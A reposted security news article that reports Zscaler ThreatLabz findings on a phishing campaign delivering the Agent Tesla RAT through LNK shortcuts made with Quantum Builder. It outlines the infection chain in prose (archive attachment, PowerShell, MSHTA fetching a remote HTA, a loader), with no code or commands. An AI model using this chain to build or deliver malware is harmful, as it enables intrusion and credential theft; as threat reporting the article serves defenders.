Hackers Using Dark Web Quantum Builder To Launch Agent Tesla RAT Malware

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

Post Sharing
Recently, Zscaler ThreatLabz discovered a new malicious campaign in which the Agent Tesla RAT is delivered by a malware builder called Quantum Builder. Tesla is an active keylogging and RAT program that is based on .NET, and since 2014, it has been in operation.

Comparatively to the previous versions of this campaign, this one is much more sophisticated and features a shift towards LNK (Windows shortcut) files.

Quantum Builder

There is a malicious shortcut file that is created using Quantum Builder, and this builder is also known as “Quantum Link Builder.”

Due to shared TTPs and source code overlaps, this campaign has been linked with the Lazarus Group APT. However, security analysts were unable to ascribe this to any specific threat actor with confidence.

Malicious shortcut files can be created with Quantum Builder, since it’s a customizable tool, and not only that, it also generates malicious payloads as well:-

  • HTA
  • ISO
  • PowerShell

Payloads such as these are used for delivering next-stage malware (Agent Tesla) to the machines that have been targeted in the attack.

Infection Chain

The infection chain is a multi-stage attack chain consisting of multiple stages that are launched with the initiation of phishing emails that contain a GZIP archive file in the attachment of the mail.

A shortcut is included in this attachment, and this shortcut is used for executing PowerShell code that uses the MSHTA to launch a remote HTA.

According to the report, A Chinese supplier of Lump and Rock Sugar (Guangdong Nanz Technology co. ltd) is purportedly sending phishing emails with the arrangement of an order confirmation message. Here the message contains a malicious LNK file that masquerades itself as a legit PDF doc.

A PowerShell loader script, in turn, is decrypted and executed by the HTA file. Now to execute the Agent Tesla malware with administrative privileges, this script acts as both downloader and executor.

Alternatively, a ZIP file is substituted for the GZIP archive in a second variant of the infection sequence.

It has been observed in recent months that the use of the Quantum Builder has increased rapidly. Since a variety of malware is being distributed using it by the threat actors.

In a recent campaign against various organizations, the Quantum Builder is utilized to create malware payloads in order to launch cyber-attacks against them, and the latest among them is this Agent Tesla campaign.